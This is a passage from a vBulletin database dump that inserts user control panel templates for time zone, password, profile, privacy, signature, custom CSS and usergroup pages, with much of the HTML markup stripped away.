\r\n $vbphrase[start_of_the_week] \r\n \r\n \r\n $vbphrase[parts_use_different_start_of_week] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[sunday] \r\n $vbphrase[monday] \r\n $vbphrase[tuesday] \r\n $vbphrase[wednesday] \r\n $vbphrase[thursday] \r\n $vbphrase[friday] \r\n $vbphrase[saturday] \r\n \r\n \r\n $vbphrase[start_of_the_week]: \r\n \r\n \r\n
\r\n \r\n\r\n $template_hook[usercp_options_datetime]\r\n\r\n $customfields[datetime]\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n$template_hook[usercp_options_end]\r\n\r\n ', 'template', 1239016356, 'vBulletin Solutions', '3.8.3', 'vbulletin'),
(1426, -1, 'modifyoptions_timezone', '\r\n $vbphrase[time_zone] \r\n \r\n \r\n $vbphrase[time_auto_corrected_to_location] \r\n \r\n \r\n \r\n \r\n \r\n $timezoneoptions\r\n \r\n \r\n $vbphrase[time_zone]: \r\n \r\n \r\n \r\n $vbphrase[allow_daylight_savings_time] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[automatically_detect_dst_settings] \r\n $vbphrase[dst_corrections_always_on] \r\n $vbphrase[dst_corrections_always_off] \r\n \r\n \r\n $vbphrase[dst_correction_option]: \r\n \r\n \r\n
\r\n ', '\r\n $vbphrase[time_zone] \r\n \r\n \r\n $vbphrase[time_auto_corrected_to_location] \r\n \r\n \r\n \r\n \r\n \r\n $timezoneoptions\r\n \r\n \r\n $vbphrase[time_zone]: \r\n \r\n \r\n \r\n $vbphrase[allow_daylight_savings_time] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[automatically_detect_dst_settings] \r\n $vbphrase[dst_corrections_always_on] \r\n $vbphrase[dst_corrections_always_off] \r\n \r\n \r\n $vbphrase[dst_correction_option]: \r\n \r\n \r\n
\r\n ', 'template', 1073264751, 'vBulletin Solutions', '', 'vbulletin'),
(1427, -1, 'modifypassword', '\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \".(($show[\'edit_email_field\']) ? (\"\r\n $vbphrase[edit_email_and_password]\r\n \") : (\"\r\n $vbphrase[edit_password]\r\n \")).\"\r\n \r\n \r\n\r\n\r\n \r\n \r\n
\r\n \".(($show[\'passwordexpired\']) ? (\"\r\n
\r\n $vbphrase[current_password_expired] \r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n
$vbphrase[enter_password_to_continue]:
\r\n
\r\n
\r\n\r\n
\r\n $vbphrase[edit_password]\".(($show[\'password_optional\']) ? (\" ($vbphrase[optional])\") : (\"\")).\" \r\n \r\n \r\n\r\n \".(($show[\'edit_email_field\']) ? (\"\r\n
\r\n $vbphrase[edit_email_address] ($vbphrase[optional]) \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[edit_email_and_password]\r\n \r\n $vbphrase[edit_password]\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n
\r\n
\r\n \r\n $vbphrase[current_password_expired] \r\n
\r\n \r\n\r\n
\r\n
$vbphrase[enter_password_to_continue]:
\r\n
\r\n
\r\n\r\n
\r\n $vbphrase[edit_password] ($vbphrase[optional]) \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[edit_email_address] ($vbphrase[optional]) \r\n \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208876212, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1428, -1, 'modifyprivacy_bit', '\r\n \r\n $block[name]: \r\n \r\n \r\n \r\n \r\n $vbphrase[everyone] \r\n $vbphrase[registered_members] \r\n $vbphrase[your_contacts] \r\n $vbphrase[your_friends] \r\n \r\n \r\n ', '\r\n \r\n $block[name]: \r\n \r\n \r\n \r\n \r\n $vbphrase[everyone] \r\n $vbphrase[registered_members] \r\n $vbphrase[your_contacts] \r\n $vbphrase[your_friends] \r\n \r\n \r\n ', 'template', 1218459190, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1429, -1, 'modifyprofile', '\".(($GLOBALS[\'vbulletin\']->userinfo[\'coppauser\']) ? (\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n $vbphrase[coppa_information] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \" . construct_phrase(\"$vbphrase[make_changes_parent_notified]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'contactuslink\'] . \"\") . \"\r\n
\r\n\r\n
\r\n $vbphrase[print_new_permissions_form]\r\n
\r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n $vbphrase[edit_your_details] \" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \" \r\n \r\n\r\n $vbphrase[registration_required_information] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[email_and_password] \r\n \r\n \r\n\r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'coppauser\']) ? (\"\r\n
\r\n $vbphrase[parent_guardian_email] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'birthday_required\']) ? (\"\r\n $birthdaybit\r\n \") : (\"\")).\"\r\n\r\n $customfields[required]\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[optional_information_will] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \".(($show[\'customtitleoption\']) ? (\"\r\n
\r\n $vbphrase[custom_user_title] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'birthday_optional\']) ? (\"\r\n $birthdaybit\r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[home_page_url] \r\n \r\n \r\n\r\n
\r\n $vbphrase[instant_messaging] \r\n \r\n \r\n\r\n\".(($customfields[\'regular\']) ? (\"\r\n\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n ', '\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[coppa_information] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[make_changes_parent_notified] \r\n
\r\n\r\n
\r\n $vbphrase[print_new_permissions_form]\r\n
\r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[edit_your_details] $bbuserinfo[username] \r\n \r\n\r\n $vbphrase[registration_required_information] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[email_and_password] \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[parent_guardian_email] \r\n \r\n \r\n \r\n\r\n
\r\n $birthdaybit\r\n \r\n\r\n $customfields[required]\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[optional_information_will] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \r\n $vbphrase[custom_user_title] \r\n \r\n \r\n \r\n\r\n
\r\n $birthdaybit\r\n \r\n\r\n
\r\n $vbphrase[home_page_url] \r\n \r\n \r\n\r\n
\r\n $vbphrase[instant_messaging] \r\n \r\n \r\n\r\n
\r\n\r\n\r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n ', 'template', 1213274529, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1430, -1, 'modifyprofilepic', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n $vbphrase[edit_profile_picture] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[your_current_profile_picture] \r\n \r\n \r\n\r\n\r\n
\r\n $vbphrase[custom_profile_picture] \r\n\r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[edit_profile_picture] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[your_current_profile_picture] \r\n \r\n \r\n\r\n\r\n
\r\n $vbphrase[custom_profile_picture] \r\n\r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208876238, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1431, -1, 'modifyprofileprivacy', '\".(($errors) ? (\"\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[profile_privacy] \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[display_options] \r\n $vbphrase[block_display_options] \r\n \r\n \r\n \r\n \r\n $profileprivacybits\r\n
\r\n \r\n \r\n
\r\n \r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n\r\n ', '\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[profile_privacy] \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[display_options] \r\n $vbphrase[block_display_options] \r\n \r\n \r\n \r\n \r\n $profileprivacybits\r\n
\r\n \r\n \r\n
\r\n \r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n\r\n ', 'template', 1223392225, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'),
(1432, -1, 'modifyprofile_birthday', '\".(($show[\'birthday_readonly\']) ? (\"\r\n \r\n $vbphrase[birth_date] - $birthdate \r\n \r\n \r\n \r\n $vbphrase[your_date_of_birth] \r\n $vbphrase[contact_admin_to_modify_birthday] \r\n $vbphrase[privacy]: \r\n \r\n $vbphrase[hide_age_and_dob] \r\n $vbphrase[display_age] \r\n $vbphrase[display_day_and_month] \r\n $vbphrase[display_age_and_dob] \r\n\r\n \r\n \r\n \r\n
\r\n \r\n\") : (\"\r\n\r\n \r\n $vbphrase[birth_date] \r\n \r\n \r\n\")).\"', '\r\n \r\n $vbphrase[birth_date] - $birthdate \r\n \r\n \r\n \r\n $vbphrase[your_date_of_birth] \r\n $vbphrase[contact_admin_to_modify_birthday] \r\n $vbphrase[privacy]: \r\n \r\n $vbphrase[hide_age_and_dob] \r\n $vbphrase[display_age] \r\n $vbphrase[display_day_and_month] \r\n $vbphrase[display_age_and_dob] \r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n\r\n \r\n $vbphrase[birth_date] \r\n \r\n \r\n ', 'template', 1166137587, 'vBulletin Solutions', '3.6.6', 'vbulletin');
INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`) VALUES
(1433, -1, 'modifysignature', '$preview\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[signature_permissions]\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \".(($show[\'canbbcode\']) ? (\"\r\n $vbphrase[allow_bbcode_basic] \".(($show[\'canbbcodebasic\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_color] \".(($show[\'canbbcodecolor\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_size] \".(($show[\'canbbcodesize\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_font] \".(($show[\'canbbcodefont\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_align] \".(($show[\'canbbcodealign\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_list] \".(($show[\'canbbcodelist\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_link] \".(($show[\'canbbcodelink\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_html] \".(($show[\'allowhtml\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n \") : (\"\r\n $vbphrase[allow_bbcode] $vbphrase[no]
\r\n $vbphrase[allow_html] \".(($show[\'allowhtml\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n \")).\"\r\n \r\n \r\n \".(($show[\'canbbcode\']) ? (\"\r\n $vbphrase[allow_bbcode_img] \".(($show[\'allowimg\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_code] \".(($show[\'canbbcodecode\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_php] \".(($show[\'canbbcodephp\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_html] \".(($show[\'canbbcodehtml\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[allow_bbcode_quote] \".(($show[\'canbbcodequote\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n \") : (\"\")).\"\r\n $vbphrase[allow_smilies] \".(($show[\'allowsmilies\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[can_upload_sig_img] \".(($show[\'cansigpic\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n $vbphrase[can_upload_ani_gif_sig_img] \".(($show[\'cananimatesigpic\']) ? (\"$vbphrase[yes]\") : (\"$vbphrase[no]\")).\"
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n', '$preview\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, 0)\">\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[signature_permissions]\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[allow_bbcode_basic] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_color] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_size] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_font] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_align] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_list] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_link] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_html] $vbphrase[yes] $vbphrase[no]
\r\n \r\n $vbphrase[allow_bbcode] $vbphrase[no]
\r\n $vbphrase[allow_html] $vbphrase[yes] $vbphrase[no]
\r\n \r\n \r\n \r\n \r\n $vbphrase[allow_bbcode_img] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_code] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_php] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_html] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[allow_bbcode_quote] $vbphrase[yes] $vbphrase[no]
\r\n \r\n $vbphrase[allow_smilies] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[can_upload_sig_img] $vbphrase[yes] $vbphrase[no]
\r\n $vbphrase[can_upload_ani_gif_sig_img] $vbphrase[yes] $vbphrase[no]
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n', 'template', 1208876257, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1434, -1, 'modifyusercss', '\".(($errors) ? (\"\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[customize_profile] \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \".(($usercsspermissions[\'caneditbgimage\']) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[background_images_album_x]\", \"album.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\") . \"
\r\n \") : (\"\")).\"\r\n\r\n
\r\n $usercssbits\r\n
\r\n\r\n
\r\n
\r\n
\r\n
\r\n
\r\n $vbphrase[usercss_example]\r\n
\r\n
\r\n $vbphrase[usercss_tabletitle] \r\n $vbphrase[usercss_tableheader] \r\n $vbphrase[usercss_alternating1] $vbphrase[usercss_alternating2] \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n
\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n\r\n\".(($show[\'backgroundpicker\']) ? (\"\r\n\r\n
\r\n
\r\n
\r\n
\r\n
\r\n $albumbits\r\n \r\n \r\n
\r\n
\r\n $picturerowbits\r\n
\r\n
\r\n\") : (\"\")).\"', '\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[customize_profile] \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[background_images_album_x] \r\n \r\n\r\n
\r\n $usercssbits\r\n
\r\n\r\n
\r\n
\r\n
\r\n
\r\n
\r\n $vbphrase[usercss_example]\r\n
\r\n
\r\n $vbphrase[usercss_tabletitle] \r\n $vbphrase[usercss_tableheader] \r\n $vbphrase[usercss_alternating1] $vbphrase[usercss_alternating2] \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n
\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n
\r\n
\r\n\r\n\r\n\r\n
\r\n
\r\n
\r\n
\r\n
style=\"display:none\">\r\n $albumbits\r\n \r\n \r\n
\r\n
\r\n $picturerowbits\r\n
\r\n
\r\n ', 'template', 1218462092, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1435, -1, 'modifyusercss_backgroundbit', '\".(($picture[\'thumburl\']) ? (\"\r\n \r\n\") : (\"\r\n \".(($picture[\'caption_preview\']) ? (\"$picture[caption_preview]\") : (\"$vbphrase[picture]\")).\" \r\n\")).\" ', '\r\n \r\n \r\n $picture[caption_preview] $vbphrase[picture] \r\n ', 'template', 1198265110, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1436, -1, 'modifyusercss_backgroundrow', '', '', 'template', 1198263406, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1437, -1, 'modifyusercss_bit', '\r\n $selector[phrase] \r\n \r\n \r\n \".(($selector[\'description\']) ? (\"\r\n
$selector[description]
\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'font\']) ? (\"\r\n
\r\n \r\n \".(($field_names[\'font_family\']) ? (\"\r\n $vbphrase[usercss_font_family] \r\n \") : (\"\")).\"\r\n \".(($field_names[\'font_size\']) ? (\"\r\n $vbphrase[usercss_font_size] \r\n \") : (\"\")).\"\r\n \r\n \r\n \".(($field_names[\'font_family\']) ? (\"\r\n \r\n \r\n \r\n \r\n $fontselect\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($field_names[\'font_size\']) ? (\"\r\n \r\n \r\n \r\n \r\n $fontsizeselect\r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'textcolor\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'border\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'background\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n ', '\r\n $selector[phrase] \r\n \r\n \r\n
\r\n $selector[description]
\r\n \r\n \r\n\r\n
\r\n \r\n \r\n \r\n $vbphrase[usercss_font_family] \r\n \r\n \r\n $vbphrase[usercss_font_size] \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $fontselect\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $fontsizeselect\r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n ', 'template', 1215096648, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1438, -1, 'modifyusercss_error', '\" . construct_phrase(\"$vbphrase[x_has_invalid_properties]\", \"$selectorname\", \"$selector[phrase]\") . \": $invalid_properties_string ', '$vbphrase[x_has_invalid_properties] : $invalid_properties_string ', 'template', 1195125262, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1439, -1, 'modifyusercss_error_link', '$error_link_phrase ', '$error_link_phrase ', 'template', 1195126022, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1440, -1, 'modifyusercss_headinclude', '\r\n\r\n$usercss_string\r\n\r\n\r\n\".(($show[\'backgroundpicker\']) ? (\"\") : (\"\")).\"\r\n\r\n', '\r\n\r\n$usercss_string\r\n\r\n\r\n \r\n\r\n', 'template', 1209739296, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1441, -1, 'modifyusergroups', '\".(($show[\'joinrequests\']) ? (\"\r\n\r\n\r\n $vbphrase[you_leader_following_groups] \r\n \r\n\r\n $vbphrase[user_group] \r\n $vbphrase[view_requests] \r\n $vbphrase[list_members] \r\n \r\n$joinrequestbits\r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'nonmembergroups\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n $vbphrase[following_groups_available_to_join] \r\n \r\n\r\n $vbphrase[user_group] \r\n $vbphrase[joining_conditions] \r\n $vbphrase[join_group] \r\n \r\n$nonmembergroupbits\r\n\r\n \r\n \r\n
\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'membergroups\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n $vbphrase[member_of_following_groups] \r\n \r\n\r\n $vbphrase[user_group] \r\n $vbphrase[user_title] \r\n $vbphrase[leave_group] \r\n \r\n\r\n $primarygroup[opentag]$primarygroup[title]$primarygroup[closetag] \r\n $primarygroup[usertitle] \r\n ($vbphrase[cannot_leave_primary_group]) \r\n \r\n$membergroupbits\r\n\r\n \r\n \r\n
\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'displaygroups\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n \r\n\") : (\"\")).\"', '\r\n\r\n\r\n $vbphrase[you_leader_following_groups] \r\n \r\n\r\n $vbphrase[user_group] \r\n $vbphrase[view_requests] \r\n $vbphrase[list_members] \r\n \r\n$joinrequestbits\r\n
\r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[following_groups_available_to_join] \r\n \r\n\r\n $vbphrase[user_group] \r\n $vbphrase[joining_conditions] \r\n $vbphrase[join_group] \r\n \r\n$nonmembergroupbits\r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[member_of_following_groups] \r\n \r\n\r\n $vbphrase[user_group] \r\n $vbphrase[user_title] \r\n $vbphrase[leave_group] \r\n \r\n\r\n $primarygroup[opentag]$primarygroup[title]$primarygroup[closetag] \r\n $primarygroup[usertitle] \r\n ($vbphrase[cannot_leave_primary_group]) \r\n \r\n$membergroupbits\r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n ', 'template', 1208876289, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1442, -1, 'modifyusergroups_displaybit', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n $usergroup[description]
\r\n \r\n $usergroup[usertitle] \r\n \r\n $vbphrase[identify_as_member_of_group] \r\n \r\n ', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n $usergroup[description]
\r\n \r\n $usergroup[usertitle] \r\n \r\n $vbphrase[identify_as_member_of_group] \r\n \r\n ', 'template', 1077053171, 'vBulletin Solutions', '', 'vbulletin'),
(1443, -1, 'modifyusergroups_groupleader', 'session->vars[\'sessionurl\'] . \"u=$leader[userid]\\\">$leader[username] ', '$leader[username] ', 'template', 1069262102, 'vBulletin Solutions', '', 'vbulletin'),
(1444, -1, 'modifyusergroups_joinrequestbit', '\r\n $joinrequest[opentag]$joinrequest[title]$joinrequest[closetag] \r\n $joinrequest[requests] \".(($joinrequest[\'requests\']) ? (\"session->vars[\'sessionurl\'] . \"usergroupid=$joinrequest[usergroupid]\\\">$vbphrase[review_join_requests] \") : (\"\")).\" \r\n session->vars[\'sessionurl\'] . \"usergroupid=$joinrequest[usergroupid]\\\">$vbphrase[list_members] \r\n \r\n', '\r\n $joinrequest[opentag]$joinrequest[title]$joinrequest[closetag] \r\n $joinrequest[requests] $vbphrase[review_join_requests] \r\n $vbphrase[list_members] \r\n \r\n', 'template', 1070080815, 'vBulletin Solutions', '', 'vbulletin'),
(1445, -1, 'modifyusergroups_memberbit', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n $usergroup[description]
\r\n \r\n $usergroup[usertitle] \r\n \r\n \".(($show[\'isleader\']) ? (\"\r\n ($vbphrase[leader_of_this_group]) \r\n \") : (\"\r\n $vbphrase[leave_group] \r\n \")).\"\r\n \r\n ', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n $usergroup[description]
\r\n \r\n $usergroup[usertitle] \r\n \r\n \r\n ($vbphrase[leader_of_this_group]) \r\n \r\n $vbphrase[leave_group] \r\n \r\n \r\n ', 'template', 1121360033, 'vBulletin Solutions', '3.5.0 Release Candidate 1', 'vbulletin'),
(1446, -1, 'modifyusergroups_nonmemberbit', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n $usergroup[description]
\r\n \r\n \r\n \".(($ismoderated) ? (\"\r\n $vbphrase[requests_approved_by_leader] $vbphrase[group_leaders]: $groupleaders\r\n \") : (\"\r\n $vbphrase[anyone_free_to_join_group]\r\n \")).\"\r\n \r\n \r\n \".(($joinrequested) ? (\"\r\n \" . construct_phrase(\"$vbphrase[requested_to_join_x_at_y]\", \"$joinrequest[date]\", \"$joinrequest[time]\") . \"\r\n \".(($joinrequest[reason]) ? (\"$vbphrase[request_reason] : $joinrequest[reason] \") : (\"\")).\"\r\n \") : (\"\r\n $vbphrase[join_group] \r\n \")).\"\r\n \r\n ', '\r\n \r\n $usergroup[opentag]$usergroup[title]$usergroup[closetag]\r\n $usergroup[description]
\r\n \r\n \r\n \r\n $vbphrase[requests_approved_by_leader] $vbphrase[group_leaders]: $groupleaders\r\n \r\n $vbphrase[anyone_free_to_join_group]\r\n \r\n \r\n \r\n \r\n $vbphrase[requested_to_join_x_at_y] \r\n $vbphrase[request_reason] : $joinrequest[reason] \r\n \r\n $vbphrase[join_group] \r\n \r\n \r\n ', 'template', 1121360039, 'vBulletin Solutions', '3.5.0 Release Candidate 1', 'vbulletin'),
